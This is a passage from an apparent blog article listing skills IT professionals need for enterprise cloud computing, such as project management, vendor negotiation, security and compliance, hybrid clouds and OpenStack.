With the cloud, organizations can streamline their IT resources, offloading much of day-to-day systems and application management. But that doesn’t mean IT abdicates all responsibility. There’s a need for language skills to build applications that can run quickly on the Internet.
3. Enterprise architecture and business needs analysis
Cloud computing requires that IT pros cross disciplines, especially where service-oriented architecture comes into play.
4. Project management skills
Organizations must not let the flexibility of the cloud lead to missed deadlines or amorphous goals. That could negate the cloud cost advantage.
5. Contract and vendor negotiation skills
To deal with service-level agreements—and the problems involved when those SLAs are breached—IT pros need experience with contract and vendor negotiations.
6. Security and compliance
IT professionals dealing with the cloud must have a firm grasp of security protocols and the regulatory mandates related to their industries, both within and without the United States.
7. Data integration and analysis skills
IT pros may not be data scientists, but to take advantage of big data, they do need to help data scientists hook up big data, internal ERP, data warehouse and other data systems, and work with the business side to make effective use of big data.
8. Mobile app development and management
Organizations need to think about what kind of mobile experience they are offering to customers via the cloud and how they would like to improve that down the line.
As enterprise cloud computing evolves, it is important to add two more skills to the list:
9. Knowledge of open hybrid clouds
IT is not homogeneous, and neither should your cloud computing model be. IT pros need to understand how to build and extend their companies’ cloud computing infrastructure in a way that is open.
10. Understanding of OpenStack
In order to build the kind of flexible, secure, interoperable cloud infrastructure mentioned above, IT pros must have a strong understanding of the technology required to make it so. OpenStack is a key component. OpenStack, a collaboration of developers and cloud computing technologists, comprises a series of projects delivering various components for a cloud infrastructure solution.
- See more at: http://www.buildyourbestcloud.com/147/10-skills-it-pros-need-cloud-computing#sthash.3twHmHHG.dpuf